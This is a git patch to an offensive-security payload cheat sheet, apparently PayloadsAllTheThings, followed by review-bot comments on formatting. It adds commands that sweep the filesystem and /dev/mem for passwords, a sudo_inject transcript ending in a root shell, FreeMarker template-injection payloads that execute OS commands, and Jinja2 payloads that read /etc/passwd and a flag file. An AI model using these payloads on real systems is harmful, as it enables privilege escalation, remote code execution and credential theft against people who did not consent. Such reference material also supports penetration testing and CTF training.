From b4633bbb668f581df160539a6fd87168136a3c74 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 14 Apr 2019 21:01:14 +0200 Subject: [PATCH] sudo_inject + SSTI FreeMarker + Lin PrivEsc passwords --- .../Linux - Privilege Escalation.md | 50 ++++++++++++++++++- Server Side Template Injection/README.md | 17 +++++-- 2 files changed, 61 insertions(+), 6 deletions(-) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 1421684..9242f04 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -13,6 +13,10 @@ ## Summary * [Checklist](#checklist) +* [Looting for passwords](#looting-for-passwords) + * [Files containing passwords](#files-containing-passwords) + * [Last edited files](#last-edited-files) + * [In memory passwords](#in-memory-passwords) * [Scheduled tasks](#scheduled-tasks) * [Cron jobs](#cron-jobs) * [Systemd timers](#systemd-timers) @@ -27,6 +31,7 @@ * [NOPASSWD](#nopasswd) * [LD_PRELOAD and NOPASSWD](#ld-preload-and-passwd) * [Doas](#doas) + * [sudo_inject](#sudo-inject) * [GTFOBins](#gtfobins) * [Wildcard](#wildcard) * [Writable /etc/passwd](#writable---etc---passwd) @@ -111,6 +116,29 @@ * Checks to see if the host has Docker installed * Checks to determine if we're in an LXC container +## Looting for passwords + +### Files containing passwords + +```powershell +grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null +find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \; +``` + +### Last edited files + +Files that were edited in the last 10 minutes + +```powershell +find / -mmin -10 2>/dev/null | grep -Ev "^/proc" +``` + +### In memory passwords + +```powershell +strings /dev/mem -n10 | grep -i PASS +``` + ## Scheduled tasks ### Cron jobs @@ -216,7 +244,6 @@ sh-5.0# id uid=0(root) gid=1000(swissky) ``` - ## SUDO ### NOPASSWD 
@@ -269,6 +296,24 @@ There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, rem permit nopass demo as root cmd vim ``` +### sudo_inject + +Using [https://github.com/nongiach/sudo_inject](https://github.com/nongiach/sudo_inject) + +```powershell +$ sudo whatever +[sudo] password for user: +# Press +c since you don't have the password. +# This creates an invalid sudo tokens. +$ sh exploit.sh +.... wait 1 seconds +$ sudo -i # no password required :) +# id +uid=0(root) gid=0(root) groups=0(root) +``` + +Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf](https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf) + ## GTFOBins [GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. @@ -470,4 +515,5 @@ lxc exec mycontainer /bin/sh - [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt) - [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/) - [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html) -- [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) \ No newline at end of file +- [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) +- [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject) \ No newline at end of file diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 51334ac..f994467 100644 
--- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -20,6 +20,8 @@ * [Code execution](#code-execution) * [Smarty](#smarty) * [Freemarker](#freemarker) + * [Basic injection](#basic-injection) + * [Code execution](#code-execution) * [Jade / Codepen](#jade---codepen) * [Velocity](#velocity) * [Mako](#mako) @@ -137,11 +139,17 @@ $output = $twig > render ( ## Freemarker -Default functionality. +You can try your payloads at [https://try.freemarker.apache.org](https://try.freemarker.apache.org) -```python -<#assign -ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} +### Basic injection + +The template can be `${3*3}` or the legacy `#{3*3}` + +### Code execution + +```js +<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} +[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} ``` ## Jade / Codepen @@ -228,6 +236,7 @@ The above injections have been tested on Flask application. ```python # ''.__class__.__mro__[2].__subclasses__()[40] = File class {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} +{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }} ``` ### Write into remote file
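Review bot: the new Summary entry `* [sudo_inject](#sudo-inject)` in `Linux - Privilege Escalation.md` points at `#sudo-inject`, but the heading this patch adds is `### sudo_inject`. GitHub-style anchor generation keeps underscores, so the link target should be `#sudo_inject` or it will not resolve.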
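Review bot: in the new `### Files containing passwords` block, the first `grep` is given both `--color=auto` and `--color=always`; the two conflict, so keep only the one that is intended. In the same hunk, all three fences are tagged `powershell` although the commands are `grep`, `find` and `strings`, so `bash` would describe them better. `### In memory passwords` also has no sentence saying what the command reads or what access it needs, whereas `### Last edited files` has a one-line description.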
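Review bot: the new `### sudo_inject` section shows a transcript but never says what `exploit.sh` does or under which conditions it applies; the only hint is the reference title added at the end of the file ("injecting process possessing sudo tokens"). Please add one sentence of prerequisites taken from the linked project so readers can tell which hosts are affected. In the transcript comments, `# Press +c` appears to have lost the key name, `This creates an invalid sudo tokens.` should read "an invalid sudo token", and `wait 1 seconds` should be "1 second".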
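Review bot: in the References hunk at the end of `Linux - Privilege Escalation.md`, the new last line still carries `\ No newline at end of file`, which is why the unchanged "Editing /etc/passwd File" entry shows up as removed and re-added. Ending the file with a newline keeps this diff to the one added reference and stops the next append from touching this line again.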
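Review bot: in the Summary hunk of `Server Side Template Injection/README.md`, the new Freemarker sub-entries link to `#basic-injection` and `#code-execution`, but the context line just above (`* [Code execution](#code-execution)`) already uses `#code-execution` for an earlier section. Repeated heading text gets a numeric suffix on the later anchors, so these links will jump to the earlier section. Either point them at the suffixed anchors or give the Freemarker headings distinct titles.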
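Review bot: in the `## Freemarker` hunk, the `### Code execution` block now holds two lines with no explanation of how they differ. The second one, `[#assign ex = ...]`, uses FreeMarker's square-bracket tag syntax, so a one-line note saying that would tell readers when each form is relevant. The fence tag changed from `python` to `js`, and neither matches a FreeMarker template; an untagged fence would be more accurate. The removed sentence `Default functionality.` was also the only description of the block, so a short replacement sentence under `### Code execution` would help.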
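Review bot: in the last hunk, the added `{{ config.items()[4][1]... }}` line has no comment, while the existing comment above it only explains `''.__class__.__mro__[2].__subclasses__()[40]`. The line depends on what sits at `config.items()[4][1]` in one specific application and reads `/tmp/flag`, which looks like a leftover from a single challenge rather than a general example next to `/etc/passwd`. Either add a comment stating what that config entry is expected to be, or drop the line, since it otherwise repeats the one above it.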